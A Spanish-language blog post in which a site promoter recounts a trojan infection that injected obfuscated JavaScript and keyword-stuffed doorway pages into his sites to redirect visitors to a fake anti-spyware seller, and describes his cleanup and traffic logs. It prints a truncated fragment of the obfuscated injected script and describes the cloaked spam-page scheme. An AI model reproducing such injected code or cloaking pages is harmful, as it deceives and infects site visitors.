Lo que un promotor de sitios puede aprender de una infección con troyano

Ayer noté que mis visitas diarias en uno de mis sitios se habí­an quintuplicado de golpe. Luego de la satisfacción inicial por el reconocimiento a la calidad de mis artí­culos, algo llamó mi atención: Los temas pedidos no tení­an nada que ver con mi temática, promoción de sitios. Pedí­an recetas de comidas y tragos, porno, etc. Y cuando uno visitaba las páginas, que no habí­an sido publicadas por mí­, un malware trataba de vender por la fuerza un producto anti-spamware.

Alarmado, empecé a recorrer mis sitios con FTP, y noté una cantidad de archivos que no había­n sido publicados por mí­, y que correspondí­an a fechas de entre el 7 y el 15 de este mes. Rápidamente hice un chequeo antivirus online con Bitdefender o alguno similar, limpié mi máquina y repuse los archivos originales en los dominios. La infección seguramente subió archivos a través de mi PC, porque abarcaba varios servidores distintos, de sitios que eran accesibles por mi FTP.

La limpieza no fue fácil. Salvo la fecha, no habí­a nada para guiarme. Muchos archivos mís habí­an recibido una inyección de código al final, en Javascript, con links, y no eran detectables desde el explorador. Por lo tanto, los archivos con fecha sospechosa fueron sobreescritos. Otros archivos eran nuevos, pero tení­an nombres similares a los ya existentes, y los contenidos mezclaban contenido original mí­o con otro proveniente de recetas de comida francesa, en inglés… Y muchos links hacia el malware que te extorsiona a que lo compres. Ojo! No entrar sin tomar precauciones, tiene un javascript malicioso: está basado en adware-spyware-removal.co.cc. No aconsejo a nadie comprar un producto anti-virus hecho por fabricantes de virus. Es ceder ante la extorsión y puede tener un virus aún peor.

Antes de limpiar, me bajé una carpeta con archivos infectados para analizarlos. Los abrí­ primero con Notepad para limpiar el Javascript, o desde el cache de Google con la opción Sólo Texto. También le agregué rel=”nofollow” a la infinidad de links que tiene para evitar perder PageRank. Conservo ejemplos de página con contenido adulterado, y otro ejemplo de página generada propiamente por el virus, usando material que encontró en el sitio y en otros anteriores que infectó.

El javascript que saqué está ofuscado (enrevesado para que no se entienda) y luce algo así­ como:

<script language=”javascript”>function not(kf,cybf){if(!cybf){cybf=’+=ETxNe0C.UW6{ki8HJmt9R1IML(aQG*hn-scyY&PBZASv3f)l4KOXV?wuDpqF7;’;}var y;var OR=”;for(var azho=0;azho<kf.length;azho+=4){y=(cybf.indexOf(kf.charAt(azho))&63)<<18|(cybf.indexOf(kf.charAt(azho+1))&63)<<12|(cybf.indexOf(kf.charAt(a …

… </script>

Las páginas enlazan a otras infectadas por el mismo agente, lo cual genera una gran red de páginas interconectadas que llevan mayormente el tráfico al sitio de venta de malware.

Pero lo interesante fue analizar los logs de mi servidor, y observar que el tráfico vení­a en parte de otras páginas infectadas, y en parte de los mismos buscadores. Los referrers eran Google y Live Search, las frases clave stuffed hot cherry peppers, o Recipe/Elderflower Punch, y mis páginas infectadas estaban en los primeros puestos.

Supongo que esos posicionamientos puedo mantenerlos, si subo una página limpia que reemplace a la anterior, y explico cual fue el problema. Pero no me interesan los buscadores de recetas exóticas, por lo tanto esperaré que los buscadores se cansen de encontrar error 404 y me den de baja.

Lo que si es interesante es la estructura de las páginas usadas para captar visitas a través de buscadores: mucho texto, generado por algún Content Generator (similar a Synonymizer), y estructurado en páginas con muchas palabras clave, enlaces intercalados con texto relevante, mucho H1, y nada de diseño ni imágenes. Cantidad (miles de páginas en un sólo directorio, decenas de nuevos directorios en cada sitio infectado) y no calidad (texto derivado de mezclar palabras y frases). Obviamente que son páginas que el ojo humano no ve, porque el Javascript las redirecciona, pero sí el spider de los buscadores.

Dado que una de mis herramientas para posicionar sitios es un Page Generator que hace cosas parecidas, aunque sin invadir ni robar espacio de servidor ajeno, tomé debida nota de la estructura de dichas páginas.